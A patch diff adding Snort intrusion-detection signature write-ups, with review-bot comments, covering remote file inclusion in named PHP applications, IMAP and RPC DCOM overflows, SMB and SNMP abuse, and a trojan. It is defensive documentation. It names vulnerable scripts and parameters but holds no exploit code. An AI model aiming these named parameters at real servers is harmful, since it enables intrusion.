+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
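Review bot: this is the same generic web-server text as 1224.txt in this patch, with no indication of the request pattern SID 1136 matches; "Ease of Attack: Simple. Exploits exist." and "False Positives: None known." cannot both be assessed without knowing what the rule looks for. Add the matched URI or content string, scope Affected Systems to the product concerned instead of "All systems using a web server.", and fill in Additional References.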
--- /dev/null
+++ b/doc/signatures/100000682.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+100000682
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Harpia" application running on a webserver. 
+Access to the file "email.php" using a remote file being passed as the 
+"header_prog" parameter may indicate that an exploitation attempt has been 
+attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "header_prog" parameter in the "email.php" script used 
+by the "Harpia" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Harpia
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
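Review bot: the last Detailed Information paragraph and the Attack Scenarios section talk about supplying credentials to an authentication mechanism, which is unrelated to passing a remote URL in the "header_prog" parameter of email.php described in the Summary. Describe the real scenario (attacker-hosted PHP fetched and executed by include with the webserver's privileges) and, under Corrective Action, add the PHP-side mitigation of disabling remote includes (allow_url_fopen / allow_url_include set to Off) alongside the generic "apply vendor patches" advice. Affected Systems should name the Harpia versions concerned rather than "All systems running CGI applications using Harpia".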
--- /dev/null
+++ b/doc/signatures/1719.txt
@@ -0,0 +1,64 @@
+Rule:  
+
+--
+Sid:
+1719
+
+--
+Summary:
+This event is generated when an attempt is made to execute a directory
+traversal attack.
+
+--
+Impact:
+Information disclosure. This is a directory traversal attempt which can
+lead to information disclosure and possible exposure of sensitive
+system information.
+
+--
+Detailed Information:
+Directory traversal attacks usually target web, web applications and ftp
+servers that do not correctly check the path to a file when requested by
+the client.
+
+This can lead to the disclosure of sensitive system information which may
+be used by an attacker to further compromise the system.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An authorized user or anonymous user can use the directory traversal 
+technique, to browse folders outside the ftp root directory. Information
+gathered may be used in further attacks against the host.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known
+
+--
+False Negatives:
+None known
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches
+
+Upgrade the software to the latest non-affected version.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+
+--
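Review bot: Affected Systems is empty, and the rest of the entry cannot decide which service it covers: Detailed Information says "web, web applications and ftp servers" while Attack Scenarios talks only about browsing "outside the ftp root directory". State which protocol and port SID 1719 inspects and list the affected software. "False Negatives: None known" is also doubtful for a traversal signature, since the same traversal can be sent with alternate encodings (for example "%2e%2e/" or backslashes) that a literal "../" match will miss; say whether the rule relies on preprocessor normalization to see those forms.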
--- /dev/null
+++ b/doc/signatures/1573.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1573
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
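Review bot: third copy of the generic CGI text in this patch (see 1396.txt and 1869.txt), again without the script name, URI or product that SID 1573 targets, and again with "ona web server" in Detailed Information. Without the matched pattern an analyst cannot judge the "Exploits exist" and "None known" false-positive claims; add the specifics and a reference.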
--- /dev/null
+++ b/doc/signatures/1146.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1146
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
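Review bot: identical to 1224.txt and 1136.txt earlier in this patch; nothing in this entry is specific to SID 1146. Replace the generic web-server narrative with what the rule matches, the product and versions affected, and a reference; until then the False Positives and Ease of Attack sections are unverifiable.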
--- /dev/null
+++ b/doc/signatures/298.txt
@@ -0,0 +1,60 @@
+SID:
+298
+--
+
+Rule:
+--
+
+Summary:
+This event is triggered when an attempt is made to overflow an imapd server.
+--
+
+Impact:
+Commands may be run on the IMAP server as the root user, This can lead to a complete compromise of the targeted system
+--
+
+Detailed Information:
+Failure to check the size of the value passed to the 'AUTHENTICATE' 
+command on certain IMAPD implementations can lead to a buffer overflow. 
+This in turn can allow arbitrary commands to be executed on the server.
+--
+
+Affected Systems:
+	Netscape Messaging Server 3.55, University of Washington imapd 10.234
+--
+
+Attack Scenarios:
+An attacker may attempt to exploit a vulnerable imapd server, permitting
+the execution of arbitrary commands possibly with the privilege of user 
+"root".
+--
+
+Ease of Attack:
+Simple. Sample exploit code is available.
+--
+
+False Positives:
+None known
+--
+
+False Negatives:
+None known
+
+--
+
+Corrective Action:
+Vendors have provided updated versions, upgrading will resolve this 
+problem
+
+--
+
+Contributors:
+Snort documentation contributed by matthew harvey <indexone@yahoo.com>
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+References:
+
+--
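Review bot: the section layout departs from the template the other files use (SID before Rule, "--" separators after the blank line instead of before it, "References:" instead of "Additional References:"), which will break anything that parses these files by header; reorder to Rule / Sid / Summary ... / Additional References like the rest. Impact has a comma splice ("as the root user, This can lead"). References is empty even though Corrective Action says "Vendors have provided updated versions"; cite the advisory for the AUTHENTICATE overflow so the fixed versions of Netscape Messaging Server and UW imapd can be looked up, and clarify that "10.234" is a UW imapd build number so it is not mistaken for a typo.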
--- /dev/null
+++ b/doc/signatures/678.txt
@@ -0,0 +1,79 @@
+Rule:  
+
+--
+Sid: 
+678
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an SQL database
+server that may result in a serious compromise of the data stored on
+that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained administrator access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an
+SQL database that may result in a serious compromise of all data stored
+on that system.
+
+Such commands may be used to gain access to a system with the privileges
+of an administrator, delete data, add data, add users, delete users,
+return sensitive information or gain intelligence on the server software
+for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the
+result of spawning a remote shell as a consequence of a successful
+network exploit. 
+
+--
+Affected Systems:
+	Microsoft SQL Servers
+
+--
+Attack Scenarios: 
+Simple. These are SQL database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and
+issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Disallow direct access to the SQL server from sources external to the
+protected network.
+
+Ensure that this event was not generated by a legitimate session then
+investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Microsoft MSDN:
+http://msdn.microsoft.com/library/en-us/tsqlref/ts_sp_da-di_8nas.asp
+
+--
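Review bot: the Summary and Detailed Information never say which command SID 678 matches ("a command", "a special command"); name it, since the MSDN link points at a specific stored-procedure reference page and the analyst needs the procedure name to judge a hit. The sentence "This connection can either be a legitimate telnet connection or the result of spawning a remote shell" looks pasted from a telnet rule: Microsoft SQL Server is reached over TDS (1433/tcp) or SMB named pipes, not telnet. Attack Scenarios ("Simple. These are SQL database commands.") is an Ease of Attack answer, not a scenario; describe who issues the command and from where. The False Positives note about administrators connecting from outside the protected network is good and is the right hint for tuning.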
--- /dev/null
+++ b/doc/signatures/1696.txt
@@ -0,0 +1,70 @@
+Rule:  
+
+--
+Sid: 1696
+
+-- 
+
+Summary: 
+This event is generated when a command is issued to an Oracle database server that may result in a serious compromise of the data stored on that system.
+
+-- 
+Impact: 
+Serious. An attacker may have gained superuser access to the system.
+
+--
+Detailed Information:
+This event is generated when an attacker issues a special command to an Oracle database that may result in a serious compromise of all data stored on that system.
+
+Such commands may be used to gain access to a system with the privileges of an administrator, delete data, add data, add users, delete users, return sensitive information or gain intelligence on the server software for further system compromise.
+ 
+This connection can either be a legitimate telnet connection or the result of spawning a remote shell as a consequence of a successful network exploit. 
+
+Oracle servers running on a Windows platform may listen on any arbitrary
+port. Change the $ORACLE_PORTS variable in snort.conf to "any" if this
+is applicable to the protected network.
+
+--
+
+Attack Scenarios: 
+Simple. These are Oracle database commands.
+
+-- 
+
+Ease of Attack: 
+Simple.
+
+-- 
+
+False Positives: 
+This event may be generated by a database administrator logging in and issuing database commands from a location outside the protected network.
+
+--
+False Negatives:
+Configure your ORACLE_PORTS variable correctly for the environment you are in. 
+In many situations ORACLE negotiates a communication port. This means that 1521 
+and 1526 are not used for communication during the entire transaction. A new 
+port is negotiated after the initial connect message, all communication after 
+that uses this other port. If you are in an environment such as this, you should 
+set ORACLE_PORTS to "any" in snort.conf. 
+ 
+Otherwise, there are no known false negatives.
+
+-- 
+
+Corrective Action: 
+Use a firewall to disallow direct access to the Oracle database from sources external to the protected network.
+Ensure that this event was not generated by a legitimate session then investigate the server for signs of compromise
+
+Look for other events generated by the same IP addresses.
+
+--
+Contributors: 
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
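Review bot: The Attack Scenarios section of 1696.txt describes no scenario; "Simple. These are Oracle database commands." duplicates the Ease of Attack entry directly below it. The file also never says which command the rule matches, only "a special command", and the ORACLE_PORTS advice appears twice (under Detailed Information and again under False Negatives). Suggest naming the matched command in Detailed Information, replacing Attack Scenarios with a sentence on how an attacker would issue it, keeping the ORACLE_PORTS paragraph in one place, and adding the missing period after "signs of compromise" in Corrective Action. The sentence about "a legitimate telnet connection" reads as copied from an unrelated rule, since nothing else in the file concerns telnet.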
--- /dev/null
+++ b/doc/signatures/100000714.txt
@@ -0,0 +1,55 @@
+
+
+Rule:
+
+--
+Sid:
+100000714
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file include vulnerability in the "PHPRaid" application running on a webserver. Access to the file "view.php" using a remote file being passed as the "phpraid_dir" parameter may indicate that an exploitation attempt has been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized administrative access to the server or application. Possible execution of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a remote machine via the "phpraid_dir" parameter in the "view.php" script used by the "PHPRaid" application running on a webserver.
+
+If stringent input checks are not performed by the CGI application, it may also be possible for an attacker to execute system binaries or malicious code of the attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to a CGI application running ona web server. Some applications do not perform stringent checks when validating the credentials of a client host connecting to the services offered on a host server. This can lead to unauthorized access and possibly escalated privileges to that of the administrator. Data stored on the machine can be compromised and trust relationships between the victim server and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using PHPRaid
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own credentials to gain access. Alternatively the attacker can exploit weaknesses to gain access as the administrator by supplying input of their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
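Review bot: Typo in the Detailed Information of 100000714.txt: "running ona web server" should read "running on a web server", and "attackers choosing" (Impact and Detailed Information) should be "attacker's choosing". The third paragraph is generic CGI credential-checking text that does not describe a remote file include; the file would be clearer if it stopped after the "phpraid_dir" paragraph and the sentence on missing input checks. The Sid, Affected Systems and Contributors blocks are also missing the blank line before "--" that the other files use.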
--- /dev/null
+++ b/doc/signatures/1666.txt
@@ -0,0 +1,59 @@
+Rule:
+
+--
+Sid:
+1666
+
+--
+Summary:
+This event is generated when a webserver returns a directory listing of
+it's cgi-bin.
+
+--
+Impact:
+Information gathering.
+
+--
+Detailed Information:
+This event is generated when a webserver returns a directory listing of
+it's cgi-bin. The scripts listed may be valuable to an attacker when
+planning further attacks against the webserver. It may also be possible
+for the attacker to download the contents of the cgi-bin and view the
+contents of the script sources.
+
+--
+Affected Systems:
+	All web server platforms.
+
+--
+Attack Scenarios:
+An attacker can list the contents of the cgi-bin, discover the filename
+of a vulnerable script and use the information to execute an exploit
+against the server.
+
+--
+Ease of Attack:
+Simple. No exploit software required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow directory content listing of the cgi-bin.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
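Review bot: "it's cgi-bin" in both the Summary and Detailed Information of 1666.txt should be "its cgi-bin" (possessive, not the contraction). Since Detailed Information says an attacker may download the cgi-bin contents and read the script sources, Corrective Action could also recommend restricting access to the cgi-bin directory, not only disabling the directory listing.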
--- /dev/null
+++ b/doc/signatures/541.txt
@@ -0,0 +1,51 @@
+Rule:
+
+--
+Sid: 541
+
+--
+Summary:
+This event is generated when activity relating to network chat clients is detected.
+
+--
+Impact:
+Policy Violation. Use of chat clients to communicate with unkown external sources may be against the policy of many organizations.
+
+--
+Detailed Information:
+Instant Messaging (IM) and other chat related client software can allow users to transfer files directly between hosts. This can allow malicious users to circumvent the protection offered by a network firewall.
+
+Vulnerabilities in these clients may also allow remote attackers to gain unauthorized access to a host.
+
+--
+Attack Scenarios:
+A user may transfer sensitive company information to an external party using the file transfer capabilities of an IM client.
+
+An attacker might utilize a vulnerability in an IM client to gain access to a host, then upload a Trojan Horse program to gain control of that host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow the use of IM clients on the protected network and enforce or implement an organization wide policy on the use of IM clients.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <brian.caswell@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
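Review bot: Typo in the Impact line of 541.txt: "unkown external sources" should be "unknown external sources". This file also omits the Affected Systems section that the other signature files in this patch carry; given the Detailed Information, "All systems running Instant Messaging or chat client software" would fit. "None Known" under False Positives and False Negatives lacks the period used elsewhere.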
--- /dev/null
+++ b/doc/signatures/987.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+987
+
+--
+Summary:
+This event is generated when an attempt is made to disclose the contents of an Active Server Page (ASP) using a malformed HTR request. 
+
+--
+Impact:
+Information gathering.  Fragments of the source code of an ASP may be returned possibly disclosing sensitive information.
+
+--
+Detailed Information:
+HTR is an older scripting language still supported by Internet Information Service (IIS).  HTR requests are preocessed by ISM.DLL that improperly evaluates malformed HTR requests.  This may disclose parts of the source code associated with a .asp file referenced in the request. 
+
+--
+Affected Systems:
+
+Microsoft IIS 4.0, 5.0 
+
+--
+Attack Scenarios:
+An attacker can craft a malformed request to disclose source code possibly revealing sensitive information. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the patch referenced in the Microsoft link.
+
+Consider running the IIS Lockdown Tool to disable HTR functionality.
+
+--
+Contributors:
+Original rule writer unknown
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE
+http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0063
+
+Bugtraq
+http://www.securityfocus.com/bid/1488
+
+Microsoft
+http://www.microsoft.com/technet/security/bulletin/ms00-031.asp
+
+--
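Review bot: Typo in the Detailed Information of 987.txt: "preocessed" should be "processed". Minor: "None Known." under False Positives and False Negatives is capitalised differently from the "None known." used in most other files of this patch.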
--- /dev/null
+++ b/doc/signatures/100000570.txt
@@ -0,0 +1,74 @@
+Rule:
+
+--
+Sid:
+100000570
+--
+Summary:
+This event is generated when an attempt is made to exploit a remote file 
+include vulnerability in the "Indexu" application running on a webserver. 
+Access to the file "app_change_pwd.php" using a remote file being passed as the 
+"admin_template_path" parameter may indicate that an exploitation attempt has 
+been attempted. 
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized 
+administrative access to the server or application. Possible execution of 
+arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt has been made to include a file from a 
+remote machine via the "admin_template_path" parameter in the 
+"app_change_pwd.php" script used by the "Indexu" application running on a 
+webserver.
+
+If stringent input checks are not performed by the CGI application, it may also 
+be possible for an attacker to execute system binaries or malicious code of the 
+attackers choosing.
+
+This event is generated when an attempt is made to gain unauthorized access to 
+a CGI application running ona web server. Some applications do not perform 
+stringent checks when validating the credentials of a client host connecting to 
+the services offered on a host server. This can lead to unauthorized access and 
+possibly escalated privileges to that of the administrator. Data stored on the 
+machine can be compromised and trust relationships between the victim server 
+and other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+All systems running CGI applications using Indexu
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her own 
+credentials to gain access. Alternatively the attacker can exploit weaknesses 
+to gain access as the administrator by supplying input of their choosing to the 
+underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has had 
+all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+--
+Additional References:
+
+--
+
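Review bot: Same typos as in the other remote-file-include files: "running ona web server" in the Detailed Information of 100000570.txt should be "on a web server", and "attackers choosing" should be "attacker's choosing". The generic third paragraph about credential validation does not describe the remote file include via "admin_template_path" and could be dropped. The Sid, Affected Systems and Contributors blocks are missing the blank line before "--".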
--- /dev/null
+++ b/doc/signatures/2992.txt
@@ -0,0 +1,66 @@
+Rule:
+
+--
+Sid:
+2992
+
+--
+Summary:
+This event is generated when an attempt is made to shutdown a Windows
+system via SMB. 
+
+--
+Impact:
+Serious.
+
+--
+Detailed Information:
+This event indicates that an attempt was made to shutdown a Windows
+system via SMB across the network.
+
+It may be possible for an attacker to manipulate a Windows system
+from a remote location. Shutting down a system may lead to a Denial of
+Service for the target host.
+
+--
+Affected Systems:
+	Microsoft Windows systems.
+
+--
+Attack Scenarios:
+An attacker may be able to manipulate a target system using SMB. The
+attacker may gain complete control over the affected system.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check the host for signs of system compromise.
+
+Turn off file and print sharing on the target host.
+
+Use a packet filtering firewall to disallow SMB access to the host from
+sources external to the protected network.
+
+Disallow remote registry manipulation.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
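Review bot: "shutdown" is used as a verb in the Summary and Detailed Information of 2992.txt ("to shutdown a Windows system"); the verb form is "shut down". Impact reads only "Serious." while Detailed Information already names the consequence, so "Serious. Denial of Service for the target host." would be more informative. False Negatives uses "None Known." against "None known." under False Positives in the same file.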
--- /dev/null
+++ b/doc/signatures/2471.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+2471
+
+--
+Summary:
+This event is generated when an attempt is made to access the C$ default
+administrative share of a Windows host.
+
+--
+Impact:
+Serious. Possible administrator access to the host. Information 
+disclosure.
+
+--
+Detailed Information:
+By default, Windows hosts have default administrative shares of the 
+local hard drives using the format %DRIVE_LETTER% + $. Anybody with 
+administrative rights can remotely access the share.
+
+--
+Affected Systems:
+	Windows hosts.
+
+--
+Attack Scenarios:
+An attacker may be attempting to access files located on the C drive of 
+the host.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Disallow Netbios access from external networks (tcp port 139).
+
+--
+Contributors:
+Original Rule Writer Unknown
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by Josh Sakofsky
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS339
+
+Microsoft:
+http://support.microsoft.com/default.aspx?scid=kb;en-us;100517
+
+--
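Review bot: Corrective Action in 2471.txt lists only one port ("Disallow Netbios access from external networks (tcp port 139)"); the RPC/SMB files elsewhere in this patch (3429.txt, 3248.txt) block 139 and 445 together, and for consistency 445 should be listed here as well. "Netbios" should be written "NetBIOS".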
--- /dev/null
+++ b/doc/signatures/1107.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1107
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
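Review bot: 1107.txt never says which "known vulnerability" or request pattern sid 1107 matches; every section is generic web-server text and Additional References is empty, so a reader cannot tell what triggered the event. Suggest adding the matched URI or payload to Detailed Information together with a vendor or CVE reference. "attackers choosing" in Impact should be "attacker's choosing".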
--- /dev/null
+++ b/doc/signatures/3429.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3429
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
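Review bot: Typo in Ease of Attack of 3429.txt: "Expoit code exists" should be "Exploit code exists". Additional References is empty although Detailed Information describes a specific RPC DCOM buffer overflow; the vendor bulletin should be cited. The text is identical to 3248.txt later in this patch apart from the Sid value; if the two rules match different traffic, each file should say what distinguishes it.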
--- /dev/null
+++ b/doc/signatures/1892.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1892
+
+--
+Summary:
+This event is generated when SNMP communications contain a NULL value 
+the authentication string.
+
+--
+Impact:
+Medium to Serious. Depending on if the community string was for 
+read-only, read-create or read-write an attacker could gain a varying 
+level of access to a system.
+
+--
+Detailed Information:
+An SNMP community string is the authentication process that a host 
+running SNMP uses to grant access.
+
+--
+Affected Systems:
+Numerous. Routers, switches, servers, NAS systems, many others.
+
+--
+Attack Scenarios:
+An attacker can launch a scan of all network attached devices looking 
+for port 161 (UDP) and then attempt to gain access using SNMP.
+
+--
+Ease of Attack:
+Simple. There are many free SNMP "tree walking" programs, an example of 
+such is getIF.
+
+--
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+--
+Corrective Action:
+Make sure that all devices that have SNMP turned on have complex 
+passwords assigned.
+
+Disable unneeded WRITE / CREATE community strings.
+
+Since SNMP traffic is not encrypted, use a packet filtering firewall to 
+restrict SNMP communications to the protected network.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Snort documentation contributed by  Mike Rivett ebiz@rivett.org
+
+-- 
+Additional References:
+
+GetIF:
+http://www.wtcs.org/snmp4tpc/getif.htm
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-1999-0517
+
+--
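Review bot: The Summary of 1892.txt is missing a word: "contain a NULL value the authentication string" should read "contain a NULL value as the authentication string". Corrective Action says "complex passwords assigned" while the rest of the file correctly calls them community strings; use "community strings" there too. There is a double space in "contributed by  Mike Rivett".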
--- /dev/null
+++ b/doc/signatures/614.txt
@@ -0,0 +1,94 @@
+Rule:
+
+--
+Sid:
+614
+
+--
+Summary:
+hack-a-tack is a Trojan Horse.
+
+--
+Impact:
+Possible theft of data via download, upload of files, execution of files and reboot the targeted machine.
+
+--
+Detailed Information:
+This Trojan affects the following operating systems:
+
+	Windows 95
+	Windows 98
